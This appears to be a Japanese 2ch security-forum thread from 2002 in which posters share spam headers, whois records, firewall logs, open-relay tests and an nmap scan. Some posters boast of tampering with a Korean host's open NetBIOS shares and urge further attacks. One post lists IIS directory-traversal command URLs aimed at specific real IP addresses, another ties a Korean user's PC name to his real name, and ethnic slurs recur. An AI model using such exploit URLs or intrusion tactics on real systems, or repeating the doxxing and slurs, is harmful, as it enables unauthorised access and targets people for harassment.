The e-mail subscription address is: [email protected]
To unsubscribe please click here.
or
Send an email with the word 'remove' in the subject line to [email protected]
Or you may mail us at:
PO BOX 810052
Boca Raton, Fl 33481-0052
----------------------------
From:COPYDVD's< [email protected] >
Reply-To:COPYDVD's< [email protected] >
Subject:DuplicateDVDMoviesonAnyCD-R
Received:from[64.32.34.150]by **.com with ESMTPid **
Received:(qmail aaa invoked by uid 5)
From [email protected]
To unsubscribe from the Hi-Speed Media mailing list, please
enter your e-mail address above and click "REMOVE" or
click here.
----------------------

From:equalaMail< [email protected] >
Subject:Make up to $6000/month working from home
Received: from [66.70.89.30] by **.com with ESMTP id **
Received: by dpm2.emailsvc.net (PowerMTA(TM) v1.5)
(envelope-from< [email protected] >)
From [email protected]
Message-ID:< [email protected] >
This EqualaMAIL Promotion was sent to you as a valued subscriber.
If you would rather not receive emails from EqualaMail
and would like to like to delete your name from our list please click here.
Questions, Opinions or Feedback
Email Us or write us at; Equalamail,PO Box 23248, Ft. Lauderdale, Fl. 33307
------------------------
From:FreeCards< [email protected] >
Subject:250 full-color business/personal cards FREE! Unlimited refills!
Received:from[65.118.100.150]by **.com with ESMTP id **
From [email protected]
X-Sender: offer888.net
Complain-To: [email protected]
You received this email because you signed up at one of Offer888.com's websites
or you signed up with a party that has contracted with Offer888.com.
To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
------------------------

From: [email protected]
Reply-To: [email protected]
Subject:Re:Need Helpwithyourbills
Received:from bldg13.com ([206.137.224.27])
by *.com with Microsoft SMTPSVC(5.0.2195.4905)
Received: from dqyck.netscape.net ([63.175.91.20])
by bldg13.com (8.10.2+Sun/8.10.2) with SMTP id
Message-Id:< [email protected] >
X-Mailer:Microsoft Outlook Express 5.00
Return-Path: [email protected]

Free 1 Minute Debt Consolidation Quote
* Quickly and easily reduce Your Monthly Debt Payments Up To 60%
We are a 501c Non-Profit Organization that has helped 1000's consolidate their
debts into one easy affordable monthly payment. For a Free - No Obligation
quote to see how much money we can save you, please read on.
---------------------
From: [email protected]
Subject :
Have all other diet programs failed you?
Received: from [207.33.16.6] by *.com with ESMTP id **
Received:(from pmguser@localhost)by s1062.mb00.net (8.8.8pmg/8.8.5)
From [email protected]
Message-Id:< [email protected] >
X-Info: Report abuse to list owner at [email protected]
X-PMG-Userid: funnymoney
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".
-----------------------

From:ITTTechnicalInstitute< [email protected] >
Subject:The Good News Is At ITT Technical Institute!
Received:from[216.242.142.45] by *.com with ESMTP
From [email protected]
Message-ID:< [email protected] >
X-Mailer:Mozilla 4.04 [en] (Win95; I)
This email is not sent unsolicited. This is an Opt-In Network mailing!
This message is sent to subscribers ONLY.
Send an email with the word 'remove' in the subject line to [email protected]
Or you may mail us at:
PO BOX 810052
Boca Raton, Fl 33481-0052
----------------------
From:"Lower My Bills"< [email protected] >
Subject:Eliminate ourDebt!Reduce Your Payments by 50%
Received: from [209.223.117.227] by *.com (3.2) with ESMTP id
Received:fromlocalhost(root@localhost)by db22.ad360.com (8.11.6/8.11.6)
From [email protected]
----------------
From:MrTrivia< [email protected] >
Reply-To:MrTrivia< [email protected] >
Subject:30-Second Trivia
Received: from [64.32.34.160] by *.com with ESMTP id
Received: (qmail 1234invoked by uid 5)
From [email protected]
To unsubscribe from the Hi-Speed Media mailing list, please
enter your e-mail address above and click "REMOVE" or
click here.
------------------

From:< [email protected] >
Reply-To:< [email protected] >
Subject:Ultra PasswordsisnowatUltraXXXPasswords.com!
Received: from [210.100.160.60] by *.com with ESMTP
Received: from 90.16.216.225 ([90.16.216.225]) by smtp013.mail.yahou.com with NNFMP
Received: from pet.vosni.net ([38.169.181.93])by rly-xr02.nikavo.net with NNFMP
Received: from unknown (193.67.43.63)by mail.gimmixx.net with SMTP
Received: from 72.172.15.102 ([72.172.15.102]) by loxi.pianstvu.net with NNFMP
From [email protected]
X-Mailer: Microsoft Outlook, Build 10.0.2
Dear Ultra Passwords newsletter subscriber,

On May 2nd 2002, our domain UltraPasswords.com was illegally HIJACKED!
We are fighting to get our name back as soon as possible, but for now
please visit our working mirror at our NEW name at UltraXXXPasswords.com!
---------------
From:UncovertheTRUTH< [email protected] >
Subject:Uncover the TRUTH about ANYONE!
Received: from hispeedmailer.com ([64.32.34.150]) by *.com with Microsoft SMTPSVC(5.0.2195.4905)
Return-Path: [email protected]

>>140 何が困った？
>>141-145 どうした？

inetnum: 61.182.0.0 - 61.182.255.255
netname: CHINANET-HE
descr: CHINANET Hebei province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: DK26-AP
tech-c: ZC24-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-HE
changed: [email protected] 20010216
source: APNIC

person: Dongmei Kou
address: A12,Xin-Jie-Kou-Wai Street,
address: Beijing,100088
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: DK26-AP
mnt-by: MAINT-NEW
changed: [email protected] 20010405
source: APNIC

person: zhiyong chen
address: hebei province shijiazhuang
address: fanxi road No.19
address: hebei shuju tongxin ju
country: CN
phone: +86-311-6051394
fax-no: +86-311-6672895
e-mail: [email protected]
nic-hdl: ZC24-AP
mnt-by: MAINT-CHINANET-HE
changed: [email protected] 20010212
source: APNIC

>>146

>>141-145 のスパムメールのヘッダから第三者中継が可能か判る。
参照
http://pc.2ch.net/test/read.cgi/sec/1015207001/304-305

Whois貼り付けるだけのヤツは地獄に堕ちます。

>>149 禿同！

これだけバカ呼ばわりされて、なおかつWhois貼るんだから、
基地か痲疎か火馬か、でなければ嫌がらせだよなー

211.57.46.126
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 211.52.0.0 - 211.63.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20000216
changed: [email protected] 20010606
source: APNIC

person: Host Master
address: 11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,
address: Seoul, Korea, 137-857
country: KR
phone: +82-2-2186-4500
fax-no: +82-2-2186-4496
e-mail: [email protected]
nic-hdl: HM127-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020507
source: APNIC

From:TheCooptNetwork< [email protected] >
Subject:$100GiftVoucher>NoCostComputerLearning>FromVideoProfessor
Received:from[216.98.14.2]by ** with ESMTP id **
Received:by emailsvc.net(PowerMTA(TM) v2)(envelope-from < [email protected] >)
From [email protected]
Message-ID:< [email protected] >
Video Professor knows that by giving you a gift voucher
to spend on ANY of our $100 computer lessons, you'll see the quality of our CD-ROM's and come back for more.
AND, you'll have enough left over to take the popular
'Home Depot Home Improvement 1-2-3' CD FREE as well.
All we ask is that you pay just $6.95 to cover shipping
and handling. A small price to pay, for such great products. So don't delay. Redeem your special voucher today!
Choose your lesson from the following subjects: Windows XP,
ME, 98, or 95, Word, Excel, Quicken, Internet, PowerPoint, Outlook, FrontPage, WordPerfect, Works, Access, Lotus 1-2-3, DOS.
*You only pay $6.95 shipping and handling conveniently billed
to your Visa, Mastercard, American Express of Discover card.
When you order, you will also receive additional lessons without
obligation to purchase. IBM & PC compatible computers only.
Limit one free lesson per household. Running time is approximately 60 minutes. Some restrictions may apply.
This COOPTnetwork Promotion was sent to you as a valued subscriber.
If you would rather not receive emails from the COOPTnetwork and
would like to delete your name from our list please click here.
Questions, Opinions or Feedback
Email Us or write us at; COOPTnetwork,PO Box 23248, Ft. Lauderdale, Fl. 33307

mail.vertcoms.com (pri=10)
問題あり：不正な中継を受け付けます。
(65.118.67.254)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
---
stinger.brain2002.com (pri=10)
問題あり：不正な中継を受け付けます。
(216.242.35.205)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
---
pony.opthome.com (pri=10)
問題あり：不正な中継を受け付けます。
(216.242.142.61)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
---
offers123.com (pri=0)
接続に失敗：ネットワークが混雑しているか、
サーバが停止している可能性があります。
---
hispeedmailer.com (pri=0)
接続に失敗：ネットワークが混雑しているか、
サーバが停止している可能性があります。

pony.oin-1.com (pri=10)
問題あり：不正な中継を受け付けます。
(216.242.142.61)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
---
raider.oin-1.com (pri=10)
問題あり：不正な中継を受け付けます。
(65.118.67.227)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
---
hsmspecials.com (pri=0)
接続に失敗：ネットワークが混雑しているか、
サーバが停止している可能性があります。
---
deal123.net (pri=0)
接続に失敗：ネットワークが混雑しているか、
サーバが停止している可能性があります。
---
raider.vertcoms.com (pri=10)
問題あり：不正な中継を受け付けます。
(65.118.67.227)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

>>152 そのkoreanはtelnet開けてるぜ。　
挨拶にいってきたらどうよ。　whois貼るのにも飽きただろう？

>>153-155 だんだん君がスパム化してきたね。

チョンがポートスキャンかましてきたんで、相手を探ったらNetBIOSが開けっ放し。
ディスク共有も見えるヴォケだったので、ちょっとイタズラしてきました（ｗ

>>157 晒して晒して！！ nmapの練習台にするから

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

>>158
ポートスキャンのアラートが出たらbacktrace掛けると、ワークグループ名やノード名が出てくるの
が結構あるよ。
そこが狙い目。

ちょん晒し上げ！

IntruderIP 61.73.18.224
Node JUNGHYUNYONG
Workgroup WORKGROUP
NetBIOS __MSBROWSE__
MAC 004E4D50524F

アイ・ビー・アイ株式会社しつこいです
どなたさまですか？

>>161
ＰＣに自分の名前つけてるね。
ジュン・ヒュンヨンくん。
調べたら鄭絃龍と書くようだ。

>>160 了解っす
>>163 自分の名前..（ｗ

あぼーん

>>161
韓国のズルむけ厨房ってば、何してるんだよ・・・

>>164
LEGIONとかHAKTEKで思う存分いたぶっておあげなさい。

もしNetBIOSが開けっ放しで
プリンターサーバーが共有してあったら
自分の所から共有のプリンターサーバーに
画像とか送れるわけでしょう？
プリンターの設定とかいじれるんでしょう？
あははっ

>>161
MAC 004E4D50524F = NMPRO

>>165
ちゃんと経路の確認はしてるんだよな？
From:だけみて騒いでると逆に訴えられるぞ、アフォ！

>>170
もう遅いだろ。
特定できる程度の伏字じゃ晒したも同然だし、こういうのをチクるのが
２ちゃんねらだからな。
相手次第だが、どの程度で済むやら・・・。

>>168
このスレに書いてるので言わせてもらうが、笑われたくなかったら
あまり大きい声でそういうこと言うなよ。

153.196.56.114,auth をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 153.196.56.114,auth
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 206.124.0.15,49260
ﾌﾟﾛｾｽ名は N/A
206.124.0.15
Dimensional Communications (NETBLK-DIMENSIONAL-BLK-1)
910 16th Street, Box 14
Denver, CO 80202
US
Netname: DIMENSIONAL-BLK-1
Netblock: 206.124.0.0 - 206.124.31.255
Maintainer: DIMC
Coordinator:
Dimensional Hostmaster(DH69-ORG-ARIN)
[email protected]

Received: from 211.57.215.226 (HELO 211.57.216.195)
(211.57.215.226) by **.jp with SMTP
Received:from[63.85.85.236] by smtp-server6.tampabay.rr.com with SMTP
Received:from unknown(124.215.35.163) by rly-xw01.mx.aol.com with QMQP
Received:from unknown(28.35.188.67) by rly-xl04.mx.aol.com with esmtp
Received: from rly-xw01.mx.aol.com ([153.196.56.114])
by lax-ca.osd.concentric.net with SMTP
From:ltxcLaura< [email protected] >
CC: [email protected] [email protected]
[email protected]
Subject:Hey! mgivu
Sender:ltxcLaura< [email protected] >
X-Mailer: Microsoft Outlook Express 5.50.4133.2400

America's #1 Government Grant Program!
The Federal Government Gives Away Billions of Dollars
In Grants Each & Every Year (Free Money!) T
ake Advantage Of This Opportunity Today And Change Your Life Forever
30 DAY MONEY BACK GUARANTEE!
Can't wait on the mail? You can receive our fabulous Grant Guide Book
in one easy Download! Start searching for Grants In Minutes!
Simply order your Grant Guide Book today by sending $25 Cash,
Check or Money Order with your e-mail address enclosed to:

なんかうち、〜.it　なアドレスからスキャンよくくらうんだけど、
なんかそういう国別な傾向ってある？

日付: 02/05/11 時刻: 1:17:20
ｱﾄﾞﾚｽ 147.208.171.140 からのﾎﾟｰﾄｽｷｬﾝを検出しました｡
少なくとも 11 個のﾎﾟｰﾄがﾎﾟｰﾄｽｷｬﾝされたのを検出したので
以降のｱｸｾｽを 30 分間遮断しました｡



nslookup 147.208.171.140

Name: portscan02.norton.com
Address: 147.208.171.140


何やってるんだ？

WHOIS

From:Approved< [email protected] >
Reply-To:Approved< [email protected] >
Subject:Applytoday!100%GuaranteedMastercard!
Received:from hispeedmailer.com ([64.32.34.150])
by ** with Microsoft SMTPSVC(5.0.2195.4905)
Received:(qmailinvoked by uid 5)
Return-Path: [email protected]
Message-ID:< [email protected] >
*Issue guarantee applies as long as bank issuing cards is
issuing the store-valued cards, and $100 offer is not valid in
circumstances beyond our control that result in a non-issue of a card.
The ChexCard may be substituted for another card with similar features..
For all other requests, please do not reply to this email. Instead,
go to www.masterbuxx.com. There you will find answers
to many common questions, along with a form for contacting us
if you can't find the information you're looking for.
---------------
From:InkJetDept< [email protected] >
Reply-To:InkJetDept< [email protected] >
Subject:PrinterCartridges-Saveupto80%-Inkjet&LaserToners
Received:from[64.32.34.185] by ** with ESMTP id **
Received:(qmailinvoked by uid 5)
From [email protected]

From: [email protected]
Subject:RefinanceYourMortgage
Received:from[24.168.101.40] by ** with ESMTP id **
Received:from yahoo.ca[66.134.56.234] by mattmontalto.com (SMTPD10-2.0)
From [email protected]
X-Mailer:WEBmail 0.00
Message-Id:< [email protected] >
Free Mortgage Loan Analysis - No obligation!
We are a national mortgage lender referral service
who specializes in helping homeowners get the loans you need to:
Pay off big bills and stop creditors from calling
Make those long needed home improvements
Refinance your home at a better rate
Get cash out for nearly anything
*Now is the time to take advantage of falling interest rates!*
If you are a current real property owner in the United States
and would like to obtain more information regarding our offer,
please fill out the form below and send it back to us.
It only takes a few minutes, and there are absolutely no obligations!

speeddeals.com (pri=0)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
mail.mattmontalto.com (pri=0)
問題あり：不正な中継を受け付けます。
(24.168.101.40)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

OFSfi-02p5-100.ppp11.odn.ad.jp

>>176
自分でスキャンしたんじゃないの？

>>181
帰れ。

サービス :�Web 共有
ポート :�80 アクセス :�拒否
時間 :�02/5/16 7:44:54 PM
ホスト :�0x50c6029e.arcnxx13.adsl-dhcp.tele.dk
IP :�80.198.2.158
ファイアウォールの動作 :�このアクセス試行は拒否されました。将来的にこのアクセスを許可するには、Norton Personal Firewallを使って、このポートとサービスに対するすべてのアクセスを許可するか、上の一覧からIPアドレスを指定してアクセスを許可してください。

アクセスの種類 :� このアクセス試行はWebサーバーによるもので、Macintosh上で実行されていると思われます。Macintosh上にWebサーバーを用意することは多分ありませんが、「Web共有」コントロールパネルで確認する必要があります。

アクセスモード :�TCP

ホスト名の情報 :�アクセスしているコンピュータの名前は国名コードで終わっています。 dk (デンマーク). アクティブなリンクであることが保証されていないので、このホスト（http://www.tele.dk）についての詳しい情報を見つけるよい機会です。

>>183
↑↑↑↑↑そんな詳しく情報出るのか？

>>183 はNIS2002 Pro のメッセージ？

日付: 02/05/16 時刻: 22:09:34
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは www.tndproject.co.jp,auth

いま激しくやられております。

218-42-232-215.eonet.ne.jp
コイツUZEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
何回もきやがる

未使用ポート　64.71.17.66
を遮断したって今までに２０回ぐらいなってる

pc.2ch.ne64.71.177.66の未使用ポートだった
未使用ポートなら平気なんだろ

ここ1ヶ月のwebサーバへの怪しいアクセス
中国 2348 (40%)
日本 1763 (30%)
韓国 1512 (26%)
台湾 133 (2%)
アメリカ 32 (1%以下)
インドネシア 17 (1%以下)
ドイツ 7 (1%以下)
イギリス 6 (1%以下)
オーストリア、ロシア 2 (1%以下)
スペイン、ギリシア、イタリア、オランダ、香港、インド 1

たったこれだけの記録(Log87MB)をまとめるのに3時間以上かかるログアナライザ
(自作)は棄てた方がいいでしょうか?
種類別に見るとCodeRedなんかは未だに韓国が一番多い。

>>190
CodeRedに感染しているＩＰアドレスの公開を!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

日付: 02/05/16 時刻: 22:58:17
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは www.tndproject.co.jp , auth


まだ続いてるよ・・・どうにかしてくれ、うざい。

>>190
191の妹です。私からもお願いします..

Zone君が言っています。
ﾌｧｲｱｳｫｰﾙは 80.116.230.217 (TCP Port 1856) [TCP Flags: S].
から、このｺﾝﾋﾟｭｰﾀ (TCP Port 8080) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。

日時: 2002/05/16 23:05:32

毎日です。

>>186 >>192
お気の毒様。　なんか変な会社だな。
ttp://www.tndproject.co.jp/tnd/index.html
好みの娘は誰だ？

>>190
webalizerいれれ。

http://www.mrunix.net/webalizer/
http://www.medasys-lille.com/webalizer/

おお、昔の名前で出してしまった。（＾。＾）
#その節はお世話になりました>情報をくださった方々

ぐはー。今日はなんだかついてないのかつけねらわれているのか。
今度はアドレスが変わったよ・・・・
これも１００位くらってる。

日付: 02/05/16 時刻: 23:44:38
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 210.249.33.24,auth


Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.249.33.16/28
b. [ネットワーク名] HISC-NET
f. [組織名] 有限会社北海道情報システムコンサルタンツ

218.42.232.215（＝218-42-232-215.eonet.ne.jp）
いい加減消えろよ、カス野郎

>>198
あ、そこからうちにも100個くらい来てます。
情報システム屋のくせに・・・。

>>197 ついでに、
良くまとまった解説
ttp://www.eyeonsecurity.net/papers/ftpscanning.html
TAG一覧表
ttp://grim.virtualave.net/addtag.cgi?view

破られると海外warezグループの倉庫になるようですね。

晒すのはここ最近来た韓国の5つだけね
210.181.142.250
210.96.10.1
211.219.20.125
211.205.91.150
211.196.40.61

>>196
webalizerって至極普通なログアナライザじゃない?
不正なものだけ抽出して分析して分類してレポートできるの?

あっ、書き忘れ
上の5つはcodered

Nimdaとかなら未だに毎日着てるぞ
いちいち晒してたらキリが無い

61.211.230.18

ここになにか送信してたけど、
2ｃｈと関係ある？

http://61.211.230.18/

>>193 >>202
http://211.219.20.125/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
http://211.205.91.150/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
http://211.196.40.61/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

(´-`).｡oO(ちょっと体調悪いだけでも死ぬのでしょうかと聞いてるみたいなのばっかし・・・)

珍客でしょうか？

128.63.2.53 h.root-servers.net
U.S. Army Research Laboratory (NET-ARL1) ARL1
Blocked: In ICMP [3]

以上２１連打。米軍機関が何の御用なんざましょ？
ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ(((( ;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

Norton Personal Firewall 2.0 for Mac OSX

サービス :�不明
ポート :�8080 アクセス :�拒否
時間 :�02/5/16 8:26:33 PM
ホスト :�pd952cdaa.dip.t-dialin.net
IP :�217.82.205.170
ファイアウォールの動作 :�このアクセス試行は拒否されました。
将来的にこのアクセスを許可するには、Norton Personal Firewallを
使って、このポートとサービスに対するすべてのアクセスを許可するか、
上の一覧からIPアドレスを指定してアクセスを許可してください。

アクセスの種類 :�このアクセス試行は、時々このポートが標準の
Webサーバーポート（80）またはWebプロキシ（インターネットの
ファイアウォールの一種）として使われているためです。
HTTP（Web）サーバーを実装したアプリケーションが同様に
このポートを使っているかもしれません。

アクセスモード :�TCP

ホスト名の情報 :� アクセスしているコンピュータの名前は
net （通常、ネットワーク関連）で終わっています。
アクティブなリンクであることが保証されていないので、
このホスト（http://www.t-dialin.net）についての詳しい情報を
見つけるよい機会です。


このt-dialin.netってチクチク毎日くるんだが、
いったいなんなんだ。

高額納税者：強い消費者金融やパチンコ経営
http://www.mainichi.co.jp/news/selection/archive/200205/16/20020516k0000e040023000c.html

４０（―）金沢　要求　パチンコ機器製造会社社長　愛知　　４２，１５８
５３（―）金沢　全求　パチンコ機器製造会社専務　　愛知　　３６，０１１
６１（―）金沢　信求　パチンコ機器製造会社取締役　大阪　　３５，１８９
７８（―）松原　信男　パチンコ機器製造会社社長　　愛知　　３１，６２９
７９（―）金海　龍海　パチンコ店経営会社社長　　　福岡　　３１，００７
８６（―）光山　照男　パチンコ機器製造会社専務　　愛知　　３０，４１８
９１（―）全本　親民　パチンコ店経営会社社長　　　岡山　　２９，４３６

コリアンパワー炸裂！！！！！！！！！！！！
結局コリアン差別している奴らって貧乏人なんだよ。
可哀想だし、ほえさせてあげてね(同情

64.228.83.213

今朝からずっと、Ping送ってきます。
メールしたら、PCにウイルスが入っていますので復旧中とのこと。
Port80を閉じておけば大丈夫ですから、気にしないでくださいとメールきました。

そーいうもんだいか？

>>211
pingとportは関係ないような肝。
すでにDDOS踏み台なのかも。

From:Approved< [email protected] >
Reply-To:Approved< [email protected] >
To: [email protected] [email protected]
Subject:A CreditCardIsWaitingForYou! llCreditTypesWelcome!
Received:from [64.32.34.150] by hispeedmedia.com with ESMTP id **
Received:(qmail invoked by uid 6)
From [email protected]
This email was sent to you by, Hi-Speed Media Inc.,
a marketing partner of First PREMIER Bank, not from the Bank itself.
Please direct all concerns about this email or your inclusion on this list
to our email address listed above.
To unsubscribe from the Hi-Speed Media mailing list, please
enter your e-mail address above and click "REMOVE" or
click here.

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".
hsmspecials.com (pri=0)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
speeddeals.com (pri=0)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。

>>213
お前何回もうざい。

＞＞212
うーん、そーいうときは、何すればよいでしょう？（初心者版で聞くべき？スマソン）

>>215
無視したらどうっしょ。
villi感染→Ping打ちまくりって、何だか変な話なんだけど。

精神的ブラクラ踏んで、脱力中。

馬鹿どもの隔離スレはこちらですか？

日付: 2002/05/17 時刻: 22:55:58
ｱﾄﾞﾚｽ 211.191.238.190 からの不正侵入の試みを規則 NetBus ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断
によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

しつこいよ。。。マジで。。。

>>217 おまい失礼だぞ

63.51.99.142

[email protected] 通称「真由子」てめーしつけーぞ!!
http://117114.com/?kg　ここ有名なスパムサイトなので皆さん
絶対にアクセスしないで下さい

>>201

おお!!

とてもよくわかりました。目から鱗が落ちた気がします。
exploitとかでなく単純にWorld writableなanon-ftpサイトを
探していたのですね。

マクロ的に言えばある意味Warezな人たちにとってINTERNETが
超巨大なストレージになっているということだと思いますが、ミクロ的には
実害は余りないので、手の打ちようのない現実なのだと思いました。

感謝、感謝です。

203.83.71.232

香港からのお客さん。
やっぱ、中国系は日本嫌いが多いのかな？

217.185.74.189

このひとさっきから３０回以上来るんですけど。
なんか恨みでもあるのかなあ？
ノートンが回線を３０分遮断してもそのあと懲りずに何度も来る。ちょっと調べたらヨーロッパからのお客さんってことだけはわかった。

>>214
うざい
うざい
うざい
うざい
うざい
うざい
うざい
うざい
うざい
うざい
うざい
うざい

>>225
うさぎ
うさぎ
うさぎ
うさぎ
うさぎ
うさぎ
うさぎ
うさぎ
うさぎ

HTTP経由でIRCに接続しようとしたアホ

62.211.221.36 - - [18/May/2002:06:24:15 +0900] "CONNECT 192.244.23.2:6667 HTTP/1.0"
200 7582

80にたくさんコマンド投げられた。
けど、生ＩＰ出てるし、踏み台？
38.pool2.dslosaka.att.ne.jp

>>228
# nmap (V. 2.54BETA34) scan initiated Sat May 18 10:52:35 2002 as: nmap -v -sS -P0 -F -O -o test.txt 38.pool2.dslosaka.att.ne.jp
Interesting ports on 38.pool2.dslosaka.att.ne.jp (165.76.141.38):
(The 1093 ports scanned but not shown below are in state: closed)
Port State Service
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
1025/tcp open listen
1026/tcp open nterm
6666/tcp open irc-serv
7007/tcp open afs3-bos
Remote OS guesses: Windows Millennium Edition (Me), Win 2000, or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3
TCP Sequence Prediction: Class=random positive increments
Difficulty=101669 (Good luck!)
IPID Sequence Generation: Busy server or unknown class

# Nmap run completed at Sat May 18 10:52:41 2002 -- 1 IP address (1 host up) scanned in 6 seconds

おうおう　>>第三者中継可能!!!!!!!!!!!!!! 　よ、

>>229 でおまえの好きなポート開いてるぞ、バカのひとつ覚えで調べればい
いじゃん　結果報告すれや

攻撃内容ってどうやって調べるんですか？
あと"LiveUpDateを見たら...."とは？？？

>>227
(ﾟДﾟ)ﾊｧ?

>>230よ、
>>229 でおまえの好きなポート開いてるぞ、バカのひとつ覚えで調べればい
いじゃん　結果報告すれや

From:"APA"< [email protected] >
Reply-To: [email protected]
To: [email protected] [email protected]
[email protected]
Subject:You're alreadyApproved
Received:froml3.3web45.com([66.185.166.27]) by *.com
with Microsoft SMTPSVC(5.0.2195.4905)
Received:(qmailinvoked by uid 7)
Message-ID:< [email protected] >
Return-Path: [email protected]
ClickforMail never sends unsolicited email. You have received this message because you
registered with ClickforMail OR one of our carefully selected marketing partners.
If you no longer wish to receive these offers, please follow the instructions
at the bottom of this message.
Do You Meet These Criteria?
Live in the United States?
Have a Social Security Number?
18 Years of Age or Older?
Have a Valid Checking or Savings Account?
Have Valid Job or other Income of at Least $750.00/month?
Have a Home Phone Number?
No Pending Bankruptcy?
No current delinquencies in past 60 days?
If you answered YES to all of these simple questions we GUARANTEE
that you will receive a credit card with up to a $5000 credit limit.

If you would no longer like to receive e-mail from us you can unsubscribe CLICK HERE:
The preceding message was sent to you as an opt-in subscriber to ClickforMail.
If you wish to unsubscribe please follow this link:
http://remove.3web45.com/[email protected]

>>228
たぶんNimda
1回の行動で10数回のリクエストが来る

第三者中継可能？　スパムより判明
l3.3web45.com
Relay test 6
>RSET
<250 flushed
>MAIL FROM:<[email protected]>
<250 ok
>RCPT TO:<relaytest%[email protected]>
<250 ok

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

UDP port probe, 210.150.14.100, 419
[スキャン] 攻撃者は、特定のポートがリモートアクセスに使用
できるかどうかを調べようとしています。

218.27.88.169
中国からかましてきた。

Telnetで接続したら接続できるんでやんの・・・

>>238 FTPもいける

■[真由子]
[ここで待ってます]
ttp://117114.com/?kg早く来てね！
※これを餌にしてのスパム誘導、で踏み台になっているのが
218.224.37.227　

62.194.104.158:2353

TCP Port 3128て何があるんでしょうか？

